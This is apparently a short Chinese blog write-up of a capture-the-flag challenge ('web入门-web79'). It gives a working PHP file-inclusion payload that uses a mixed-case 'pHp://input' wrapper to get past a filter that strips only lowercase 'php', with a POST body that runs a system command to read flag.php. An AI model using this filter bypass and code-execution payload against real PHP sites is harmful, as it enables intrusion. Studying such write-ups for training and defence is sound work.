web入门-web79 admin 98856文章 86评论 2022年1月5日22:54:39评论44 views字数 178阅读0分35秒阅读模式 > > web入门-web79 dust /?file=pHp://input postdata: <?php system('cat flag.php'); ?> str_replace("php", "???", $file); 只过滤了小写的php,所以get方式可以通过PHP大写绕过,但是不能绕过flag.php文件,因此采用了phpinput方式。 如有更好姿势欢迎留言, 点赞 http://cn-sec.com/archives/719541.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论